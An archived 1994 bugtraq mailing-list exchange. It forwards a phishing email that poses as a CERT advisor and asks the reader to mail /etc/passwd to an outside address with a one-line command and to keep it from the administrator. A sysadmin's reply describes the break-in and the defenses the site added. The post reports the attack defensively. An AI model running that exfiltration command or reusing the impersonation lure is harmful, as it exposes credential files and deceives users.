[80] in bugtraq
Re: Another request for passwords
daemon@ATHENA.MIT.EDU (Charles Howes)
Sun Oct 23 08:43:45 1994
Date: Sun, 23 Oct 1994 04:17:40 -0700 (PDT)
From: Charles Howes <chowes@helix.net>
To: "Douglas R. Floyd" <dfloyd@paris.eng.utsa.edu>
Cc: bugtraq@crimelab.com
In-Reply-To: <9410230054.ZM10281@paris.eng.utsa.edu>
On Sun, 23 Oct 1994, Douglas R. Floyd wrote:
> I got this in the mail today (10-23).
> Seems like someone is knocking on io.com now.
>
> (The forward to paris is normal as mail gets forwarded there.)
>
> BEGIN FUNKY MESSAGE --------
>
> >From vanepp@sfu.ca Sun Oct 23 00:00:56 1994
> Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
> (931110.SGI/930416.SGI.AUTO)
> for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
> Received: from trance.helix.net
> by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
> id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
> From: vanepp@sfu.ca
> Received: from (helix.net [142.231.37.2]) by trance.helix.net
> (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
> dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
> Message-Id: <199410230433.VAA07859@trance.helix.net>
> Date: Sat, 22 Oct 1994 14:22:25
> To: dfloyd@pentagon.io.com
> Subject: Very Important
> Status: RO
>
> Dear user,
>
> It is imperative that I attain your /etc/passwd file
> immediately. It is for security reasons. You can mail
> it to me by typing:
>
> mail vanepp@sfu.ca < /etc/passwd
>
> Do not tell your system administrator. I am
> conducting an investigation on your system. Thank you
>
> Your identity will be kept confidential. I guarantee it
>
> Thank you for your cooperation.
>
> Peter Van Epp Technical Systems Operations
> CERT Security Advisor
> vanepp@sfu.ca
>
>
> END FUNKY MESSAGE -----
>
> I send cert@cert.org a copy, as well as the admins at io.com.
>
> I know this was posted earlier, but I think this is another address,
> possibly an MX record as I could not telnet or finger sfu.ca.
Hi.
Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people. Vanepp in particular.
Argh. This is the third mailbomb. I'm supposed to be in charge of
security; how do you protect against this??!?
We're using shadow passwords as of tonight, and tcp wrappers as of
last month. The bugger keeps signing on via modem, and this is a
problem. We can't afford callerid.
--
Charles Howes -- chowes@helix.net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
